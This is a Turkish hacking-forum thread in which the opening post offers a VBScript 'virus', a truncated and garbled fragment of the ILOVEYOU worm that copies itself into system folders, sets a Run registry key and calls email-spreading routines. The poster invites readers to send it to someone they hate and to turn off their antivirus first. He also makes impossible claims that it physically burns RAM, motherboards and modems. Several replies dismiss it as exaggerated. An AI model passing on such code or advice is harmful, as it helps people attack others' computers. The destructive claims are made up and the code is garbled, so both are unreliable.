Dünyayı sallayan virüs!!

VITALLION

Özel Üye
12 Nis 2013
10,988
30
27
Selamun aleyküm arkadaşlar.Aşağıda kodu vereceğim için şimdi anlatıma geçeyim.
Arkadaşlar bu virüs dünyadaki antivirüslerin korkulu rüyasıdır.Bu virüsü engelleyen antivirüsler çok azdır.%2 falan.Algılayan antivirüsler var ama onlar algıladıktan sonra da antivirüs otomatik kapanır.Sonra pc çöker.
Yaptıkları:
-Ram bellek yanar.
-Harddisk ve varsa SSD yanar.
-Anakart yanar.
-CD-ROM sürekli açılıp kapanır.
-PC ye bağlı olan modem yanar.
-Ekran Kartı yanar.
-Cmd (Komut İstemi) silinir pc işlem yapamaz.
-İnternet tarayıcısı virüslü bir siteye yönlendirilir.Daha fazla virüs bulaşır.
-İnternet tarayıcısından girilen tüm şifreler sosyal paylaşım sitelerinde yayınlanır (Kullanıcı adı e-posta ve diğer bilgilerle birlikte).
-Sosyal paylaşım hesaplarına (Facebook Twitter vs.) virüs gönderilir hesap kapatılır.
-Aynı IP adresi üzerinden açılan tüm hesaplar kapanır.
-PC format atılsa bile düzelmez.

Evet arkadaşlar gördüğünüz gibi virüs çok güçlü.Ayrıca bunları yaptıktan sonra da format atılma imkanı sıfırdır.Yani bunu yollayacağınız kişiden gerçekten nefret ediyor olmalısınız.Ben şu ana kadar kimseye yollamadım ancak deneme videosunu izlemiştim 2 ay önce ama video kaldırılmış ve bu kod da şu anda çok az yerde bulunuyor...
İŞTE MÜTHİŞ KODUMUZ:
Kod:
rem delete -pcas(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USERSoftwareMicros oftWindow s Scripting HostSettingsTimeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"MSKernel32.vbs")
c.Copy(dirwin&"Win32DLL.vbs")
c.Copy(dirsystem&"LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows Cur rentVersio nRunMSKernel32",dirsystem&"MSKernel32.vbs''
DİKKAT!!
Arkadaşlar bu kodu .bat dosyası olarak uzantısını değiştirin ve sakına kendiniz AÇMAYIN!!EĞER bilgisayarınıza zarar gelirse sorumlu değilim.
Ancak virüs kodunu kaydedip uzantıyı .bat yaparken anti-logger'lar antivirüsler ve varsa diğer virüs önleyici programları kapatın.
Yoksa kapatmazsanız antivirüsünüz algılar ve antivirüs kapanır virüs devreye girer.
Pcniz çöker kısaca.Bu yüzden antivirüs kapayalım arkadaşlar.
BİR TEŞEKKÜR YETER ;)

Son düzenleme:

'Black-King

Yaşayan Forum Efsanesi
30 Tem 2012
10,353
340
İstanbul
Koddan anlamasam yerdım. dostum reg komutundakı

rr=wscr.RegRead("HKEY_CURRENT_USERSoftwareMicros oftWindow s Scripting HostSettingsTimeout")

wscr.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout",0,"REG_DWORD"

sılıyor yönlendırme yapıyor.

açıyor WScript adlı bır dosyayı yada sıteyı.

buyuk ıhtımalle logları yolluyor copy kopyalamış burda ama bı tane sıteye yolluyor bunu.
kernel çekırdeğını kopyalıyor. dll dosyalarını kopyalıyor nereye yolladığı bellı bıle değıl.

kısacası bu kodla sadece pcsını çökertırsın oda kesın değıl ben sadece sıstemdekı dosyaları sılme kodlarını anladım gerısı boş ılavete şeyler okuduğum kadarıyla kodları bu kodlama sıstemden sadece 1-2 dosya sılıp 1-2 dosyanın loglarını bır aktarım kuyruğuna bağlayıp yolluyor o kadar.

kısacası kullanıcı sadece bununla pcyı çökertır, oda kesın değıl.

589henry

Üye
7 Ocak 2012
166
0
Koddan anlamasam yerdım. dostum reg komutundakı

sılıyor yönlendırme yapıyor.

açıyor WScript adlı bır dosyayı yada sıteyı.

buyuk ıhtımalle logları yolluyor copy kopyalamış burda ama bı tane sıteye yolluyor bunu.
kernel çekırdeğını kopyalıyor. dll dosyalarını kopyalıyor nereye yolladığı bellı bıle değıl.

kısacası bu kodla sadece pcsını çökertırsın oda kesın değıl ben sadece sıstemdekı dosyaları sılme kodlarını anladım gerısı boş ılavete şeyler okuduğum kadarıyla kodları bu kodlama sıstemden sadece 1-2 dosya sılıp 1-2 dosyanın loglarını bır aktarım kuyruğuna bağlayıp yolluyor o kadar.

kısacası kullanıcı sadece bununla pcyı çökertır, oda kesın değıl.

Kesinlikle hocama katılıyorum ve bu kod dediğin şeyleri yapabilecek kapasitede değil en fazla pc çöker 1 format sonrasında pc düzelir.
iyi forumlar

jaqen

Yeni üye
23 Nis 2015
48
0
Bu site açıldığından beri bi bitmediniz ulan. Beyler artık uyanın. Ms-dos kodlarıyla virüs mirüs yapılmaz. Çok çok yapar birine yedirir işletim sistemini çökertirsiniz. Kanmayın şu lamerlara. Ms-dos ile ddos bile yapamazken siz hayırdır ya virüs fln.

efe2002ozyay2002

Uzman üye
19 Eki 2012
1,044
0
nereye
Kendimiz öğrenip de yazsak daha iyisini yaparız.Şu ms-dos ile virüs yapılmıyor diyenlere de hayret ediyorum.Buyurun Kevin Mitnick şu tarafta gidin sorun bakalım.

hacker11548

Uzman üye
24 Haz 2015
1,131
24
İstanbul
aynen ha herkes hackerim diye geziniyor. bu böyle nereye kadar ve bu paylaşımla bi şey olmaz kardeş söylemedi deme. bak yalan yok siz hacker diye geçiniyorsunuz ama ben 3 yıllık tecrübem var o kadar şey öğrendim çok şey biliyorum ama hala hacker değilim. bilmediğim sadece kodlar kaldı. merak olmadığı için html, css , php hiç bakmadım ama lazımmış. hackerler hakkında bunlar hariç herşeyi öğrendim ve şimdi html , css , php kodlarını öğrenicem. ama ondan sonra da hacker değilim. büyük bir sitenin açığını bulana kadar ben hacker görmem kendimi. yani aranızda hacker vardır ama herkes kendini hacker diye tanıtmasın...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.